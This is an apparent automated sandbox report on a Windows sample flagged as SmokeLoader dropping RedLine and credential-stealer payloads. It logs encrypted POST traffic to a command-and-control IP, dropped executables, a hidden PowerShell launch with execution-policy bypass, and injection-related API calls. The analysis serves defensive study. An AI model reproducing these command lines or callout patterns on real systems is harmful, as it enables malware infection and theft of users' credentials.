2024-07-27 05:33:05 UTC	685	IN	Data Raw: 66 34 43 66 6c 48 55 6e 58 58 63 65 2b 63 45 59 49 7a 33 63 69 61 36 36 4a 78 68 71 4b 34 4e 37 4e 65 6b 77 79 41 59 55 65 35 46 74 4a 37 34 4f 74 61 37 72 72 53 34 36 59 58 55 64 6b 69 48 68 57 49 53 5a 74 37 2b 4a 30 65 38 72 33 30 55 73 46 49 32 32 64 7a 32 6b 54 39 53 78 37 49 68 66 6b 71 70 58 55 36 6b 38 53 39 48 2f 2b 61 65 42 31 49 4e 74 6b 64 41 42 75 37 75 74 46 72 46 6a 6d 63 64 4b 79 33 5a 56 78 79 42 71 4e 61 4f 4c 44 33 62 66 36 77 73 71 47 31 65 42 58 54 47 7a 71 2b 52 33 37 38 4b 71 49 56 46 30 44 70 55 68 55 59 56 62 4a 2f 5a 75 31 31 6d 4e 79 52 31 4d 57 48 47 56 43 73 4d 78 7a 30 46 4c 55 50 58 65 42 31 62 4f 41 33 4f 4e 59 6d 58 56 6a 6b 2f 70 5a 34 47 4f 54 5a 76 43 34 65 76 56 51 36 4c 79 75 65 62 72 6e 44 6c 77 76 69 69 35 51 31 31 Data Ascii: f4CflHUnXXce+cEYIz3cia66JxhqK4N7NekwyAYUe5FtJ74Ota7rrS46YXUdkiHhWISZt7+J0e8r30UsFI22dz2kT9Sx7IhfkqpXU6k8S9H/+aeB1INtkdABu7utFrFjmcdKy3ZVxyBqNaOLD3bf6wsqG1eBXTGzq+R378KqIVF0DpUhUYVbJ/Zu11mNyR1MWHGVCsMxz0FLUPXeB1bOA3ONYmXVjk/pZ4GOTZvC4evVQ6LyuebrnDlwvii5Q11

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	51928	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:33:06 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:33:06 UTC	1122	OUT	Data Raw: 70 64 4b 47 31 50 33 70 63 7a 63 65 6d 65 47 65 45 48 70 46 41 51 42 63 45 58 36 33 62 68 77 6c 69 67 68 56 62 4f 34 50 4c 43 59 71 68 59 6d 37 75 55 64 4d 4d 79 33 53 30 48 4c 68 33 58 52 4c 6b 57 34 50 42 79 4a 66 58 65 62 35 45 2f 76 4c 4d 58 6e 6b 4f 6c 63 52 4c 55 4d 56 54 5a 75 41 4d 7a 72 31 41 6d 79 4d 79 2f 39 57 71 35 47 72 78 67 78 70 64 37 37 32 43 64 54 54 67 34 78 6a 68 64 5a 38 79 54 2f 77 4c 75 6a 62 70 77 70 54 59 76 71 33 74 61 66 4a 52 30 73 35 4c 35 54 47 41 54 4d 42 65 30 6d 4f 2f 43 69 49 6b 2b 33 39 71 6c 53 7a 66 41 58 32 43 51 43 68 52 61 37 73 2b 33 42 71 72 6f 4b 6e 52 50 54 36 53 68 55 62 36 74 52 4a 41 33 61 57 4c 63 35 2f 4b 57 58 79 39 72 33 65 45 53 30 75 75 66 61 31 66 70 74 2f 6e 71 2b 50 4d 70 34 34 73 72 6f 73 67 7a 6e Data Ascii: pdKG1P3pczcemeGeEHpFAQBcEX63bhwlighVbO4PLCYqhYm7uUdMMy3S0HLh3XRLkW4PByJfXeb5E/vLMXnkOlcRLUMVTZuAMzr1AmyMy/9Wq5Grxgxpd772CdTTg4xjhdZ8yT/wLujbpwpTYvq3tafJR0s5L5TGATMBe0mO/CiIk+39qlSzfAX2CQChRa7s+3BqroKnRPT6ShUb6tRJA3aWLc5/KWXy9r3eES0uufa1fpt/nq+PMp44srosgzn
2024-07-27 05:33:07 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:33:07 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:33:07 UTC	685	IN	Data Raw: 59 2b 55 59 35 68 43 4d 41 6c 7a 79 34 37 68 62 45 4a 59 53 72 50 61 68 58 5a 6d 56 5a 56 65 43 52 2f 49 73 53 74 71 48 47 49 63 7a 78 78 50 65 43 2f 31 63 52 6c 6c 78 70 38 48 31 52 79 78 2b 61 62 78 7a 4d 34 34 46 38 79 2b 5a 51 77 66 51 6e 67 30 52 31 71 51 57 33 41 65 37 61 35 4c 64 77 73 64 46 41 39 7a 37 4d 6c 48 37 55 46 2b 6e 65 46 61 6d 52 44 71 4a 59 58 70 70 6e 4b 66 42 57 45 74 4c 4d 4b 30 71 47 74 55 63 73 4e 55 71 2f 49 51 58 43 70 56 5a 2b 70 49 68 44 55 72 61 51 67 6a 41 42 4f 6d 38 57 64 66 50 78 34 62 73 2f 59 38 4e 56 57 44 45 4e 74 34 45 75 76 46 38 62 79 30 48 5a 37 72 78 67 66 47 33 53 53 59 38 62 50 36 34 47 42 30 2b 39 44 6f 7a 4d 66 75 54 49 57 5a 6d 47 2b 64 44 74 6a 45 33 58 4b 62 2f 34 79 67 44 72 52 42 71 73 45 47 7a 2f 31 71 Data Ascii: Y+UY5hCMAlzy47hbEJYSrPahXZmVZVeCR/IsStqHGIczxxPeC/1cRllxp8H1Ryx+abxzM44F8y+ZQwfQng0R1qQW3Ae7a5LdwsdFA9z7MlH7UF+neFamRDqJYXppnKfBWEtLMK0qGtUcsNUq/IQXCpVZ+pIhDUraQgjABOm8WdfPx4bs/Y8NVWDENt4EuvF8by0HZ7rxgfG3SSY8bP64GB0+9DozMfuTIWZmG+dDtjE3XKb/4ygDrRBqsEGz/1q

Target ID:	0
Start time:	01:28:58
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	233'472 bytes
MD5 hash:	94267A284D656590E74246749DA7F91C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:29:05
Start date:	27/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:29:23
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Roaming\sashibt
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\sashibt
Imagebase:	0x400000
File size:	233'472 bytes
MD5 hash:	94267A284D656590E74246749DA7F91C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:30:01
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Roaming\sashibt
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\sashibt
Imagebase:	0x400000
File size:	233'472 bytes
MD5 hash:	94267A284D656590E74246749DA7F91C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:30:08
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\3530.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\3530.exe
Imagebase:	0x7ff7a0990000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:30:08
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:30:23
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\7C81.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\7C81.exe
Imagebase:	0x7ff7d4c00000
File size:	11'672'576 bytes
MD5 hash:	D3785ED170CDB1F4784D3DFF3A61DAE0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\7C81.exe, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:30:30
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\6E8A.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\6E8A.exe
Imagebase:	0x21f85a20000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	01:30:31
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\6E8A.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS
Imagebase:	0x2598ca50000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:30:31
Start date:	27/07/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0xdf0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2982362975.000000000082E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:30:38
Start date:	27/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	01:30:38
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	01:31:44
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\3530.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\3530.exe"
Imagebase:	0x7ff7a0990000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:31:44
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:31:53
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\3530.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\3530.exe"
Imagebase:	0x7ff7a0990000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:31:53
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	36.2%
Signature Coverage:	56.2%
Total number of Nodes:	80
Total number of Limit Nodes:	3

Executed Functions

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 0271455A Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02714582
Module32First.KERNEL32(00000000,00000224), ref: 027145A2

Memory Dump Source

Source File: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270d000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 07e477801d2afe7c3fa6297f9b57932c2a17fef8c5fc68d684f29dc999d575f9
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 3AF090366007246FE7203BFDEC9CB6E76E9BF49729F100528E642924C0DB70E9458A61

Function 0255003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0255024D

Strings

cess, xrefs: 0255018D
kernel32.dll, xrefs: 0255008F, 02550095

Memory Dump Source

Source File: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2550000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: d4367e16267fe39940be7016af56db0703376a54c78866face186bf6b1dcdb2f
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B6526B74A01229DFDB64CF58C995BACBBB1BF09314F1480DAE94DAB351DB30AA85CF14

Function 02550E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02550223,?,?), ref: 02550E19
SetErrorMode.KERNELBASE(00000000,?,?,02550223,?,?), ref: 02550E1E

Memory Dump Source

Source File: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2550000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0a691935fcb4c5b5a949147956b2719d15e56e8ab85107f5cb4592576584c2a3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A9D0123114512877D7002AD4DC09BCD7F1CDF09B66F108011FB0DD9080C770954046E9

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

